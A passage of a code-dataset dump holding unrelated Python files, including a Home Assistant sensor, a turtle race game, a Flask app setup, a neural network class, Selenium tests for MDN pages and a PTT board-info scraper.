\"\"\"Pass coordinator to CoordinatorEntity.\"\"\"\n super().__init__(coordinator)\n # self._attr_name = DOMAIN + \"_\" + spec[\"name\"]\n # self._attr_state_class = spec[\"state-class\"]\n # self._attr_device_class = spec[\"device-class\"]\n # self._attr_native_unit_of_measurement = spec[\"unit\"]\n\n self._name = coordinator.name + \" \" + description.name\n self._attr_device_info = coordinator.device_info\n self.entity_description = description\n self._attr_unique_id = f\"serial-{self.coordinator.cts600.port}-{description.key}\"\n\n @callback\n def _handle_coordinator_update(self) -> None:\n \"\"\"Handle updated data from the coordinator.\"\"\"\n # _LOGGER.debug(\"Entity update: %s\", self.coordinator.data)\n value = self.coordinator.cts600.data.get(self.entity_description.key)\n if value != self._attr_native_value:\n self._attr_native_value = value\n self.async_write_ha_state()\n\n @property\n def name (self):\n \"\"\"Return the name of the climate device.\"\"\"\n return self._name\n","repo_name":"frodef/nilan-cts600-homeassistant","sub_path":"custom_components/nilan_cts600/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"42882684987","text":"class Product:\n\n def __init__(self, name, price, category, id):\n self.name = name\n self.price = price\n self.category = category\n self.id = id\n\n def update_price(self, percent_change, is_increased):\n if (is_increased == True):\n self.price *= (1 + percent_change)\n elif (is_increased == False):\n self.price *= (1 - percent_change)\n return self\n \n def print_info(self):\n print(\"Name:\", self.name)\n print(f\"Price: 
{self.price:.2f}\")\n print(\"Category\", self.category)\n return self","repo_name":"jcheung83/Programming-Folder","sub_path":"Python/Store/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4628504412","text":"# Day 19 Project: Ready, Set, Turtle Power!\r\n\r\nimport random\r\nfrom turtle import Turtle, Screen\r\n\r\nscreen = Screen()\r\nstart_y = -150\r\nscreen.setup(width=500, height=400)\r\nis_race_on = False\r\n\r\nuser_bet = screen.textinput(title=\"Make your bet\", prompt=\"Which turtle will win the race? Enter a color: \")\r\ncolors = [\"red\", \"orange\", \"gold\", \"green\", \"blue\", \"purple\"]\r\nturtles = []\r\n\r\n# Create a turtle for each available color\r\nfor color in colors:\r\n new_turtle = Turtle(shape=\"turtle\")\r\n new_turtle.color(color)\r\n new_turtle.penup()\r\n new_turtle.goto(x=-230, y=start_y)\r\n start_y += 60\r\n turtles.append(new_turtle)\r\n\r\nif user_bet:\r\n is_race_on = True\r\n\r\nwhile is_race_on:\r\n\r\n for turtle in turtles:\r\n if turtle.xcor() > 230:\r\n is_race_on = False\r\n winning_color = turtle.pencolor()\r\n if winning_color == user_bet:\r\n print(f\"You've won! The {winning_color} turtle is the winner!\")\r\n else:\r\n print(f\"You've lost! The {winning_color} turtle is the winner!\")\r\n break\r\n\r\n rand_distance = random.randint(0, 10)\r\n turtle.forward(rand_distance)\r\n\r\nscreen.exitonclick()\r\n","repo_name":"mdelgadonyc/100days_of_code","sub_path":"project_day_019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73199081482","text":"n1 = input()\nli = []\nfor p in range(10):\n li.append(n1.count(str(p)))\nif max(li) == li[6] or max(li) == li[9]:\n a = (li[6] + li[9]) / 2\n a += 0.1\n print(round(a))\nelse:\n print(max(li))\n","repo_name":"kekemaster/4week","sub_path":"4week/방번호 count.py","file_name":"방번호 count.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34514199973","text":"import os\n\nfrom flask import Flask, render_template, flash\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_cors import CORS\nimport logging.handlers\n\nfrom core.route import blueprints\nfrom core import utils, constants\nimport settings\n\n\n# Create APP\napp = Flask(__name__)\ncsrf = CSRFProtect(app)\n\napp.config['CORS_HEADERS'] = 'Content-Type'\ncors_config = {\n \"origins\": [\"https://assets.crossref.org\"]\n}\nCORS(app, resources={r\"/*\": cors_config})\n\nutils.set_base_path(app.root_path)\napp.config.from_object(settings)\nutils.set_app_config(app.config)\n\napp.config['SECRET_KEY'] = utils.get_app_config('SECRET_KEY')\napp.config['SESSION_COOKIE_NAME'] = 'crossref_session'\napp.config['SESSION_COOKIE_SECURE'] = True\napp.config['SESSION_COOKIE_HTTPONLY'] = True\napp.config['PERMANENT_SESSION_LIFETIME'] = utils.get_app_config('SESSION_LIFETIME')\n\nblueprints.register_blueprints(app)\n\n\n# Logger configuration\nlogFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\nrootLogger = logging.getLogger(__name__)\n\n# fileHandler = logging.handlers.RotatingFileHandler(os.path.join(app.root_path, \"logs\", \"app.log\"),\n# maxBytes=(1048576*5), backupCount=5)\n# fileHandler.setFormatter(logFormatter)\n# 
rootLogger.addHandler(fileHandler)\n\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(logFormatter)\nrootLogger.addHandler(consoleHandler)\n\nrootLogger.setLevel(logging.INFO)\nlogging.getLogger('werkzeug').setLevel(logging.ERROR)\nlogging.getLogger('requests').setLevel(logging.ERROR)\nformatter = logging.Formatter('[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s','%m-%d %H:%M:%S')\n\n\n@app.errorhandler(400)\ndef error_400(e):\n app.logger.error(e)\n return render_template('400.html'), 400\n\n\n@app.errorhandler(401)\ndef error_401(e):\n app.logger.error(e)\n return render_template('401.html'), 401\n\n\n@app.errorhandler(404)\ndef error_404(e):\n app.logger.error(e)\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef error_500(e):\n return render_template('500.html'), 500\n\n\n@app.context_processor\ndef user_info():\n signed_in, info, session_expired = utils.signed_in_info()\n context_dict = {'signed_in': signed_in, 'orcid_info': info}\n if session_expired:\n flash(constants.ORCID_SESSION_EXPIRED, constants.MESSAGE_TYPE_WARN)\n return context_dict\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=os.environ.get(\"PORT\", 5000), debug=os.environ.get(\"DEBUG\", False))\n","repo_name":"CottageLabs/crossref_search","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70702396042","text":"import pandas as pd\r\nfrom openpyxl import load_workbook\r\n\r\n# Cargar el archivo de Excel\r\nfile_path = r\"insertar ruta del archivo\"\r\nworkbook = load_workbook(file_path)\r\nsheet_names = workbook.sheetnames\r\n\r\n# Crear un nuevo archivo de Excel para guardar los resultados\r\noutput_file = \"nombre_archivo_procesado.xlsx\"\r\nwriter = pd.ExcelWriter(output_file, engine='openpyxl')\r\n\r\n# Procesar cada hoja en el archivo\r\nfor sheet_name in sheet_names:\r\n # Leer la hoja actual\r\n data = pd.read_excel(file_path, sheet_name=sheet_name, skiprows=3)\r\n\r\n # Eliminar las primeras 4 columnas\r\n data = data.iloc[:, 4:]\r\n\r\n # Función para dividir las celdas basándose en saltos de página\r\n def split_cell(cell):\r\n if \"\\n\" in str(cell):\r\n return cell.split(\"\\n\")\r\n else:\r\n return [cell, None, None]\r\n\r\n # Aplicar la función de división solo a las columnas L en adelante\r\n for col in data.columns[7:]:\r\n new_cols = data[col].apply(split_cell).apply(pd.Series)\r\n new_cols.columns = [f\"{col}_1\", f\"{col}_2\", f\"{col}_3\"]\r\n data = pd.concat([data, new_cols], axis=1)\r\n data.drop(col, axis=1, inplace=True)\r\n\r\n # Guardar la hoja procesada en el nuevo archivo de Excel\r\n data.to_excel(writer, sheet_name=sheet_name, index=False)\r\n\r\n# Guardar y cerrar el archivo de Excel\r\nwriter.save()\r\nprint(f\"Datos procesados y guardados en {output_file}\")\r\n","repo_name":"AlejandrOropeza/ScriptsPortfolio","sub_path":"limpieza.py","file_name":"limpieza.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"3236063659","text":"#!/usr/bin/env python3\n\"\"\"10. 
NeuralNetwork Forward Propagation\"\"\"\nimport numpy as np\n\n\nclass NeuralNetwork:\n    \"\"\"a class that defines a neural network with one hidden layer\"\"\"\n    def __init__(self, nx, nodes):\n        \"\"\"Initializes the class\"\"\"\n        if type(nx) != int:\n            raise TypeError(\"nx must be an integer\")\n        if nx < 1:\n            raise ValueError(\"nx must be a positive integer\")\n        if type(nodes) != int:\n            raise TypeError(\"nodes must be an integer\")\n        if nodes < 1:\n            raise ValueError(\"nodes must be a positive integer\")\n        self.__W1 = np.random.randn(nodes, nx)\n        self.__b1 = np.zeros((nodes, 1))\n        self.__A1 = 0\n        self.__W2 = np.random.randn(1, nodes)\n        self.__b2 = 0\n        self.__A2 = 0\n\n    def forward_prop(self, X):\n        \"\"\"Calculates the forward propagation of the neural network\"\"\"\n        Z1 = np.matmul(self.__W1, X) + self.__b1\n        self.__A1 = 1 / (1 + np.exp(-Z1))\n        Z2 = np.matmul(self.__W2, self.__A1) + self.__b2\n        self.__A2 = 1 / (1 + np.exp(-Z2))\n        return (self.__A1, self.__A2)\n\n    @property\n    def W1(self):\n        \"\"\"Function for the weights vector for the hidden layer\"\"\"\n        return self.__W1\n\n    @property\n    def b1(self):\n        \"\"\"Function for the bias for the hidden layer\"\"\"\n        return self.__b1\n\n    @property\n    def A1(self):\n        \"\"\"Function for the activated output for the hidden layer\"\"\"\n        return self.__A1\n\n    @property\n    def W2(self):\n        \"\"\"Function for the weights vector for the output neuron\"\"\"\n        return self.__W2\n\n    @property\n    def b2(self):\n        \"\"\"Function for the bias for the output neuron\"\"\"\n        return self.__b2\n\n    @property\n    def A2(self):\n        \"\"\"Function for the activated output for the output neuron\"\"\"\n        return self.__A2\n","repo_name":"rubenoliveros/holbertonschool-machine_learning","sub_path":"supervised_learning/0x01-classification/10-neural_network.py","file_name":"10-neural_network.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"28044768727","text":"from datetime import date\nfrom dateutil.rrule import rrule\nimport pandas as pd\nfrom cashflow import CashFlow\n\n\nclass Life:\n    \"\"\"A person's life\n    \n    Attributes:\n        date_born (date): The date the person was born (for calculating current age)\n    \"\"\"\n\n    def __init__(self, date_born: date, cashflows: list[CashFlow] | None = None):\n        self.age_current = self.calc_age(date_born)\n        # Default to a fresh list per instance to avoid the shared mutable-default pitfall\n        self.cashflows = cashflows if cashflows is not None else []\n\n    @staticmethod\n    def calc_age(birth_date: date) -> int:\n        \"\"\"Calculate age, given a birthday.\n\n        Args:\n            birth_date (date): The birth date from which age will be calculated.\n\n        Returns:\n            int: The age of the person.\n        \"\"\"\n        today = date.today()\n        birthday_happened = (today.month, today.day) < (\n            birth_date.month,\n            birth_date.day,\n        )\n        return today.year - birth_date.year - birthday_happened\n\n    def generate_financial_forecast(self, date_start: date, date_end: date):\n        \"\"\"Generates a financial forecast based off of user-defined cashflows and\n        existing funds.\n\n        Args:\n            date_start (date): The start date of the forecast\n            date_end (date): The end date of the forecast\n        \"\"\"\n        self.forecast = pd.DataFrame(\n            index=pd.date_range(start=date_start, end=date_end, freq=\"D\"),\n            columns=[\"Net Cashflow\", \"Cashflows\"],\n        )\n        self.forecast[\"Net Cashflow\"] = 0\n        self.forecast[\"Cashflows\"] = [[] for i in range(len(self.forecast))]\n\n        for date in self.forecast.index:\n            for cashflow in self.cashflows:\n                if date in cashflow.frequency:\n                    self.forecast.loc[\n                        pd.to_datetime(date), \"Net Cashflow\"\n                    ] += 
(cashflow.sign * cashflow.amount)\n \"\"\"self.forecast.loc[pd.to_datetime(date), \"Cashflows\"] += [\n cashflow\n ]\"\"\"\n if cashflow.annual_rate_of_return:\n cashflow.amount += (\n cashflow.amount * cashflow.annual_rate_of_return\n )\n self.forecast[\"Cumulative Sum\"] = self.forecast[\n \"Net Cashflow\"\n ].cumsum()\n print(self.forecast)\n\n return self.forecast\n","repo_name":"quinn-p-mchugh/mint-fi-tracker","sub_path":"src/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16773233028","text":"import re\nimport pytest\nfrom utils.urls import assert_valid_url\nfrom pages.article import ArticlePage\n\nARTICLE_NAME = 'Send feedback (about|on) MDN'\n\n\n@pytest.mark.smoke\n@pytest.mark.nondestructive\ndef test_location(base_url, selenium):\n article_page = ArticlePage(selenium, base_url).open()\n page = article_page.header.open_feedback()\n assert re.match(ARTICLE_NAME + ' - The MDN project \\| MDN', selenium.title)\n assert re.match(ARTICLE_NAME, page.article_title_text)\n assert page.article_title_text in selenium.title\n\n\n@pytest.mark.smoke\n@pytest.mark.nondestructive\ndef test_feedback_layout(base_url, selenium):\n page = ArticlePage(selenium, base_url).open()\n assert page.is_article_displayed\n assert page.is_article_column_left_present\n assert page.is_article_column_content_present\n column_container = page.article_column_container_region\n assert column_container.is_expected_stacking\n\n\n@pytest.mark.smoke\n@pytest.mark.nondestructive\ndef test_page_links(base_url, selenium):\n page = ArticlePage(selenium, base_url).open()\n # get all page links\n article_links = page.article_link_list\n for link in article_links:\n this_link = link.get_attribute('href')\n # exclude IRC, we can't handle that protocol\n if not this_link.startswith('irc'):\n assert_valid_url(this_link, follow_redirects=True)\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/41295_test_feedback.py","file_name":"41295_test_feedback.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"71992181320","text":"import numpy as np\n\nfrom numba_neighbors import binary_tree as bt\nfrom numba_neighbors import kd_tree as kd\n\nN = 100\nn = 50\nD = 1\n# rejection_r = 0.1\nquery_r = 0.3\nmax_neighbors = 100\nleaf_size = 16\n\nr2 = query_r ** 2\n\nnp.random.seed(124)\ndata = np.random.uniform(size=(N, D)).astype(kd.FLOAT_TYPE)\ndata.sort(axis=0)\nprint(data)\n\ntree = kd.KDTree(data, leaf_size=leaf_size)\n\nqr = tree.query_radius_bottom_up(data, r2, tree.get_node_indices(), max_neighbors)\n\nsr_rej = bt.rejection_ifp_sample_precomputed(qr.dists, qr.indices, qr.counts, n)\nprint(sr_rej.indices)\n\nsr = bt.ifp_sample_precomputed(qr.dists, qr.indices, qr.counts, n)\nprint(sr.indices)\n","repo_name":"jackd/numba-neighbors","sub_path":"example/compare_ifp.py","file_name":"compare_ifp.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"6676543989","text":"from nltk.tokenize.treebank import *\nfrom nltk.metrics.distance import edit_distance\nfrom annotation import *\nfrom copy import deepcopy\nfrom tqdm import tqdm\nfrom utils import *\nimport os, re, sys\nimport joblib, json\nimport logging\nimport stopit\nlogging.basicConfig(filename='projection_log.txt',\n filemode='a',\n 
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.CRITICAL)\n\nlogging.info(\"Running Urban Planning\")\n\nlogger = logging.getLogger('urbanGUI')\n\n#PTB tokenizer and detonkenizer\n#tokenizer = TreebankWordTokenizer()\n\n\ndef update_graph_old(sentence, eds:EDS, semlink:SemLinkAnnotation):\n tokens = tokenize(semlink)\n token_idx = int(semlink.token_no)\n target_verb = tokens[token_idx]\n begin_idx = len(detokenize(tokens[:token_idx]))\n end_idx = len(detokenize(tokens[:token_idx+1]))\n candidate_verb_nodes = get_verb_nodes(eds)\n \n source_verb_node = None\n #update predicate structure\n for verb_node in candidate_verb_nodes:\n s,e = verb_node.lnk.data\n # print(s,e)\n idx_pairs = sorted([(s,e), (begin_idx, end_idx)], key= lambda x : x[0])\n\n if idx_pairs[0][1] > idx_pairs[1][0]:\n #overlap confirmed\n source_verb_node = verb_node\n \n # print(begin_idx, end_idx)\n # print(source_verb_node)\n if source_verb_node == None:\n print(target_verb)\n print(sentence)\n return 'pass','pass','pass','pass'\n #raise Exception('empty verb???')\n updated_predicate = source_verb_node.predicate + '-fn.' + semlink.fn_frame\n\n #update edge roles\n target_dependencies = [x for x in semlink.dependencies if ';' in x]\n candidate_edges = deepcopy(source_verb_node.edges)\n\n source_verb_edges_dict = deepcopy(source_verb_node.edges)\n for dependency in target_dependencies:\n token_span = dependency.split('-')[0]\n start_token_idx = int(token_span.split(':')[0])\n end_token_idx = start_token_idx + int(token_span.split(':')[1]) + 1\n begin_idx = len(detokenize(tokens[:start_token_idx]))\n end_idx = len(detokenize(tokens[:end_token_idx]))\n fn_role = dependency.split(';')[-1]\n\n target_child_node = None\n\n for key in candidate_edges.keys():\n tmp_child_node = get_node(eds, candidate_edges[key])\n s,e = tmp_child_node.lnk.data\n idx_pairs = sorted([(s,e), (begin_idx, end_idx)], key= lambda x : x[0])\n\n if idx_pairs[0][1] > idx_pairs[1][0]:\n #overlap confirmed\n target_child_node = tmp_child_node\n new_key = key + '-fn.' 
+ fn_role\n \n # print(dependency)\n # print(s,e)\n # print(begin_idx, end_idx)\n # print(new_key)\\\n \n #update edge_dict key\n source_verb_edges_dict[new_key] = source_verb_edges_dict.pop(key)\n # old_edge = (source_verb_node.id, key, tmp_child_node.id)\n # new_edge = (source_verb_node.id, new_key, tmp_child_node.id)\n # eds.edges.remove(old_edge)\n # eds.edges.append(new_edge)\n #TODO update edges\n\n break\n \n return source_verb_node.id, updated_predicate, source_verb_edges_dict\n\ndef update_graph(sentence, eds:EDS, semlink:SemLinkAnnotation, remaining_verb_nodes):\n tokens = tokenize(semlink)\n token_idx = int(semlink.token_no)\n target_verb = tokens[token_idx]\n begin_idx = len(detokenize(tokens[:token_idx]))\n end_idx = len(detokenize(tokens[:token_idx+1]))\n candidate_verb_nodes = deepcopy(remaining_verb_nodes)\n \n source_verb_node = None\n #update predicate structure\n for verb_node in candidate_verb_nodes:\n # s,e = verb_node.lnk.data\n # # print(s,e)\n # idx_pairs = sorted([(s,e), (begin_idx, end_idx)], key= lambda x : x[0])\n\n # if idx_pairs[0][1] > idx_pairs[1][0]:\n # #overlap confirmed\n # source_verb_node = verb_node\n if semlink.verb in verb_node.predicate:\n source_verb_node = verb_node\n candidate_verb_nodes.remove(verb_node)\n break\n # print(begin_idx, end_idx)\n # print(source_verb_node)\n if source_verb_node == None:\n # print(target_verb)\n # print(\"SENTENCE : \" + sentence)\n # print(get_file_name(semlink))\n logging.warning(get_file_name(semlink))\n logging.warning('no matching verb')\n return 'pass','pass','pass','pass'\n #raise Exception('empty verb???')\n updated_predicate = source_verb_node.predicate + '-fn.' + semlink.fn_frame\n\n #update edge roles\n target_dependencies = [x for x in semlink.dependencies if ';' in x.split('-')[-1]]\n arg_assosicated_strings = get_children_strings(sentence, eds, source_verb_node)\n #print(arg_assosicated_strings)\n source_verb_edges_dict = deepcopy(source_verb_node.edges)\n\n dependency_edit_distance_comparision_dict = {} \n\n for dependency in target_dependencies:\n token_intervals = dependency.split('-')[0].replace(';','*').replace(',','*').split('*')\n concate_string = \"\"\n for interval in token_intervals:\n start_token_idx = int(interval.split(':')[0])\n end_token_idx = start_token_idx + int(interval.split(':')[1]) + 1\n concate_string += detokenize(tokens[start_token_idx : end_token_idx])\n \n fn_role = dependency.split(';')[-1]\n\n target_child_node = None\n\n max_len = len(sentence)\n # for key in arg_assosicated_strings:\n # if len(arg_assosicated_strings[key]) > max_len:\n # max_len = len(arg_assosicated_strings[key])\n \n for key in arg_assosicated_strings:\n arg_assosicated_strings[key] += '='*(max_len - len(arg_assosicated_strings[key]))\n\n edit_distances = sorted([(key, edit_distance(concate_string, arg_assosicated_strings[key])) for key in arg_assosicated_strings.keys()], key= lambda x : x[1])\n dependency_edit_distance_comparision_dict[fn_role] = edit_distances\n \n #search for global minmum edit_distance between text and dependency of a given arg name\n #print(dependency_edit_distance_comparision_dict)\n for key in arg_assosicated_strings.keys():\n if len(dependency_edit_distance_comparision_dict) == 0:\n logging.warning('Semlink need an extra arg', source_verb_node, source_verb_node.edges, semlink.file_path)\n break\n minimum = 1000000\n best_fit_dep = None\n for dep in dependency_edit_distance_comparision_dict.keys():\n all_edit = dependency_edit_distance_comparision_dict[dep]\n for edit in 
all_edit:\n if edit[0] == key:\n if edit[1] < minimum:\n minimum = edit[1]\n best_fit_dep = dep\n if best_fit_dep == None:\n logging.warning('Semlink need an extra arg', source_verb_node, source_verb_node.edges, semlink.file_path)\n else:\n dependency_edit_distance_comparision_dict.pop(best_fit_dep)\n new_key = key + '-fn.' + best_fit_dep\n source_verb_edges_dict[new_key] = source_verb_edges_dict.pop(key)\n\n if len(dependency_edit_distance_comparision_dict) > 0:\n logging.warning('EDS need an extra arg', source_verb_node, source_verb_node.edges, semlink.file_path)\n # try:\n # old_key = edit_distances[0][0]\n\n # new_key = old_key + '-fn.' + fn_role\n # arg_assosicated_strings.pop(old_key)\n # source_verb_edges_dict[new_key] = source_verb_edges_dict.pop(old_key)\n # if len(arg_assosicated_strings) == 0:\n # break\n # #print(new_key)\n # except:\n # #exit() annotation mismatch\n # logging.warning('annotation mismatch', edit_distances, source_verb_node, source_verb_node.edges, sentence, semlink.file_path)\n\n \n \n return source_verb_node.id, updated_predicate, source_verb_edges_dict, candidate_verb_nodes\n\nif __name__ == \"__main__\":\n # semlinks_data = [line.rstrip() for line in open('1.2.2c.okay.txt')]\n # deepbank_files = os.listdir('deepbank_raw')\n # semlinks_dict = {}\n # counter = 0\n # for d in tqdm(semlinks_data, desc='Filtering Redundant Semlink Annotations'):\n # semlink = SemLinkAnnotation(d)\n # filename = get_file_name(semlink)\n # if filename in deepbank_files and os.path.exists(semlink.file_path):\n # if not(filename in semlinks_dict.keys()):\n # semlinks_dict[filename] = []\n # semlinks_dict[filename].append(semlink)\n # counter += 1\n \n # print(counter)\n # with open('semlink_dict.pkl', 'wb') as f:\n # joblib.dump(semlinks_dict, f)\n\n with open('semlink_dict.pkl', 'rb') as f:\n semlinks_dict = joblib.load(f)\n\n total_unmatch = 0\n total_cannot_load = 0\n total_timeout = 0\n output_dict = {}\n for f in tqdm(semlinks_dict.keys(), desc='Processing Files'):\n skip_flag = False\n try:\n current_deepbank = sentence_eds(os.path.join('deepbank_raw',f))\n except:\n logging.warning('Cannot Load {}'.format(f))\n total_cannot_load += 1\n skip_flag = True\n if skip_flag == False:\n verb_nodes = get_verb_nodes(current_deepbank.eds)\n for semlink in semlinks_dict[f]:\n if not(verb_nodes == 'pass'):\n with stopit.ThreadingTimeout(2) as context_manager:\n new_id, new_pred, new_edges, verb_nodes = update_graph(current_deepbank.sentence, current_deepbank.eds, semlink, verb_nodes)\n if context_manager.state == context_manager.EXECUTED:\n if not(verb_nodes == 'pass'):\n current_deepbank.update_text(new_id, new_pred, new_edges)\n else:\n total_unmatch += 1\n elif context_manager.state == context_manager.TIMED_OUT:\n logging.warning('Possible Loop in {}'.format(f))\n total_timeout +=1\n\n output_dict[f] = current_deepbank.eds_text\n\n \n print(total_unmatch, total_cannot_load, total_timeout)\n with open(os.path.join('deepbank_projected', 'projected.pkl'), 'wb') as f:\n joblib.dump(output_dict, f)\n\n with open(os.path.join('deepbank_projected', 'projected.json'), 'w') as f:\n f.write(json.dumps(output_dict, indent=2))\n f.close()\n \n \n","repo_name":"SpaceHunterInf/frame_net_project","sub_path":"batch_projection.py","file_name":"batch_projection.py","file_ext":"py","file_size_in_byte":10699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14937689931","text":"import re\n\ntry:\n from . import data_type\n from . 
import i18n\n from . import connect_core\n from . import log\n from . import exceptions\n from . import command\nexcept ModuleNotFoundError:\n import data_type\n import i18n\n import connect_core\n import log\n import exceptions\n import command\n\n\ndef get_board_info(\n api,\n board: str,\n call_by_others: bool) -> None:\n\n cmd_list = []\n cmd_list.append(command.GoMainMenu)\n cmd_list.append('qs')\n cmd_list.append(board)\n cmd_list.append(command.Enter)\n cmd_list.append(command.Ctrl_C * 2)\n cmd_list.append(command.Space)\n cmd = ''.join(cmd_list)\n\n if call_by_others:\n log_level = log.level.DEBUG\n else:\n log_level = log.level.INFO\n\n target_list = [\n connect_core.TargetUnit(\n i18n.IntoBoard,\n [\n '文章選讀',\n '進板畫面'\n ],\n break_detect=True,\n log_level=log_level\n ),\n ]\n\n api.connect_core.send(\n cmd,\n target_list\n )\n\n ori_screen = api.connect_core.get_screen_queue()[-1]\n # print(OriScreen)\n nuser = ori_screen.split('\\n')[2]\n # print(Nuser)\n if '[靜]' in nuser:\n online_user = 0\n else:\n if '編號' not in nuser or '人氣' not in nuser:\n raise exceptions.NoSuchBoard(api.config, board)\n pattern = re.compile('[\\d]+')\n r = pattern.search(nuser)\n if r is None:\n raise exceptions.NoSuchBoard(api.config, board)\n # 減一是把自己本身拿掉\n online_user = int(r.group(0)) - 1\n log.show_value(\n api.config,\n log.level.DEBUG,\n '人氣',\n online_user\n )\n\n target_list = [\n connect_core.TargetUnit(\n i18n.ReadingBoardInfo,\n '任意鍵繼續',\n break_detect=True,\n log_level=log_level\n ),\n ]\n\n api.connect_core.send(\n 'i',\n target_list\n )\n\n ori_screen = api.connect_core.get_screen_queue()[-1]\n # print(ori_screen)\n\n p = re.compile('《(.+)》看板設定')\n r = p.search(ori_screen)\n if r is not None:\n boardname = r.group(0)[1:-5].strip()\n log.show_value(\n api.config,\n log.level.DEBUG,\n '看板名稱',\n boardname\n )\n\n if boardname != board:\n raise exceptions.NoSuchBoard(api.config, board)\n\n p = re.compile('中文敘述: (.+)')\n r = p.search(ori_screen)\n if r is not None:\n chinese_des = r.group(0)[5:].strip()\n log.show_value(\n api.config,\n log.level.DEBUG,\n '中文敘述',\n chinese_des\n )\n\n p = re.compile('板主名單: (.+)')\n r = p.search(ori_screen)\n if r is not None:\n moderator_line = r.group(0)[5:].strip()\n if '(無)' in moderator_line:\n moderators = []\n else:\n moderators = moderator_line.split('/')\n for moderator in moderators.copy():\n check = True\n for c in moderator:\n if len(c.encode('big5')) > 1:\n check = False\n break\n if not check:\n moderators.remove(moderator)\n\n log.show_value(\n api.config,\n log.level.DEBUG,\n '板主名單',\n moderators\n )\n\n open_status = ('公開狀態(是否隱形): 公開' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '公開狀態',\n open_status\n )\n\n into_top_ten_when_hide = (\n '隱板時 可以 進入十大排行榜' in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '隱板時可以進入十大排行榜',\n into_top_ten_when_hide\n )\n\n non_board_members_post = ('開放 非看板會員發文' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '非看板會員發文',\n non_board_members_post\n )\n\n reply_post = ('開放 回應文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '回應文章',\n reply_post\n )\n\n self_del_post = ('開放 自刪文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '自刪文章',\n self_del_post\n )\n\n push_post = ('開放 推薦文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '推薦文章',\n push_post\n )\n\n boo_post = ('開放 噓文' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '噓文',\n boo_post\n )\n\n # 限制 快速連推文章, 最低間隔時間: 5 秒\n # 開放 
快速連推文章\n\n fast_push = ('開放 快速連推文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '快速連推文章',\n fast_push\n )\n\n if not fast_push:\n p = re.compile('最低間隔時間: [\\d]+')\n r = p.search(ori_screen)\n if r is not None:\n min_interval = r.group(0)[7:].strip()\n min_interval = int(min_interval)\n else:\n min_interval = 0\n log.show_value(\n api.config,\n log.level.DEBUG,\n '最低間隔時間',\n min_interval\n )\n else:\n min_interval = 0\n\n # 推文時 自動 記錄來源 IP\n # 推文時 不會 記錄來源 IP\n push_record_ip = ('推文時 自動 記錄來源 IP' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '記錄來源 IP',\n push_record_ip\n )\n\n # 推文時 對齊 開頭\n # 推文時 不用對齊 開頭\n push_aligned = ('推文時 對齊 開頭' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '對齊開頭',\n push_aligned\n )\n\n # 板主 可 刪除部份違規文字\n moderator_can_del_illegal_content = (\n '板主 可 刪除部份違規文字' in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '板主可刪除部份違規文字',\n moderator_can_del_illegal_content\n )\n\n # 轉錄文章 會 自動記錄,且 需要 發文權限\n tran_post_auto_recorded_and_require_post_permissions = (\n '轉錄文章 會 自動記錄,且 需要 發文權限' in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '轉錄文章 會 自動記錄,且 需要 發文權限',\n tran_post_auto_recorded_and_require_post_permissions\n )\n\n cool_mode = (\n '未 設為冷靜模式' not in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '冷靜模式',\n cool_mode\n )\n\n require18 = (\n '禁止 未滿十八歲進入' in ori_screen\n )\n\n log.show_value(\n api.config,\n log.level.DEBUG,\n '禁止未滿十八歲進入',\n require18\n )\n\n p = re.compile('登入次數 [\\d]+ 次以上')\n r = p.search(ori_screen)\n if r is not None:\n require_login_time = r.group(0).split(' ')[1]\n require_login_time = int(require_login_time)\n else:\n require_login_time = 0\n log.show_value(\n api.config,\n 